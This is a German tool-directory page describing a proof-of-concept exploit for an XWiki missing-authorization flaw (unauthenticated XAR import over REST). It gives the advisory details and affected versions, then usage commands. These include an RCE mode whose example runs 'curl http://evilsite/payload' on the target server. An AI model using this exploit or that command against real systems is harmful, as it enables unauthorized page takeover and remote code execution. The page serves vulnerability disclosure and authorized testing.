Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - Nicht authentifizierter XAR-Import über REST /wikis/{wikiName} | Kitploit
Tools/GitHubGitHub/portbuster1337/cve-2026-33137
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - Nicht authentifizierter XAR-Import über REST /wikis/{wikiName}

Repository anzeigen
44vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33137

XWiki Platform – Nicht authentifizierter XAR-Import via REST /wikis/{wikiName}

Beschreibung

Der REST-API-Endpunkt POST /wikis/{wikiName} in der XWiki-Plattform führt einen XAR-Import (XWiki-Archiv) durch, ohne dabei eine Authentifizierungs- oder Autorisierungsprüfung vorzunehmen. Ein nicht authentifizierter Angreifer kann durch das Senden einer manipulierten XAR-Datei beliebige Dokumente im Ziel-Wiki erstellen oder aktualisieren.

  • CVE: CVE-2026-33137
  • CWE: CWE-862 Fehlende Autorisierung
  • CVSS 4.0: 9,3 (Kritisch) – AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • Veröffentlicht: 2026-05-20

Betroffene Versionen

StatusVersionen
Anfällig> 15.10.16, > 16.4.6, > 16.10.2
Behoben16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

Auswirkungen

Ein nicht authentifizierter Angreifer kann:

  • Beliebige Wiki-Seiten mit beliebigem Inhalt erstellen
  • Vorhandene Wiki-Seiten überschreiben
  • Potenziell eine Remote-Codeausführung (RCE) erreichen, indem er Seiten mit schädlichen Velocity-/Groovy-Skripten erstellt (sofern Skripterstellung aktiviert ist)

Details

Der REST-Endpunkt POST /xwiki/rest/wikis/{wikiName} akzeptiert im Anfragetext eine XAR-Datei und importiert diese direkt in das Wiki, ohne zu prüfen, ob der Anfragende ADMIN-Rechte besitzt. Der Fix (Commit 4b7b95b) fügt eine Autorisierungsprüfung mittels ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...) hinzu.

PoC-Nutzung

root@kitploit:~
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

RCE-Modus (--rce)

Das Flag --rce importiert Seiten, die Groovy- und Velocity-Payloads enthalten und die angegebene Befehlszeichenkette ausführen. Es führt automatisch Folgendes durch:

  1. Führt einen Preflight-Check durch (Versionserkennung, Verwundbarkeitsstatus, XAR-Endpunkt-Test, Erreichbarkeit des Trigger-Pfads)
  2. Importiert Seiten mit dem vom Benutzer angegebenen Befehl, eingebettet in die Makros {{groovy}} und {{velocity}}
  3. Versucht die Ausgabe über die REST-API, die Weboberfläche und per SSTI-artiger Injektion zu rendern
  4. Meldet, welche Trigger-Pfade zugänglich bzw. blockiert sind

Voraussetzungen für eine erfolgreiche RCE:

  • Das Ziel muss die Ansicht von Seiten durch Gäste erlauben (oder es werden Anmeldedaten über -u/--password bereitgestellt)
  • Skript-/Programmierrechte müssen für den betrachtenden Benutzer aktiviert sein
  • Trigger-Pfade dürfen nicht durch Authentifizierungsweiterleitungen blockiert sein

Wie der Exploit funktioniert

  1. Eine minimale XAR-Datei (ZIP) wird erstellt, die Folgendes enthält:
    • package.xml – Paketbeschreibung
    • {Space}/{Page}.xml – Dokument-XML mit Inhalt
  2. Die XAR-Bytes werden per POST an den verwundbaren Endpunkt gesendet
  3. Ist der Endpunkt verwundbar, wird das Dokument ohne Authentifizierung erstellt
  4. Optional wird durch erneutes Auslesen der Dokument-Metadaten verifiziert

Haftungsausschluss

Dieser PoC dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Die unbefugte Nutzung dieses Exploits gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diese Software verursacht werden.

Referenzen

  • GitHub-Sicherheitshinweis GHSA-qrvh-r3f2-9h4r
  • Commit 4b7b95b (Fix)
  • JIRA XWIKI-23953
  • NVD-Eintrag
Tool herunterladen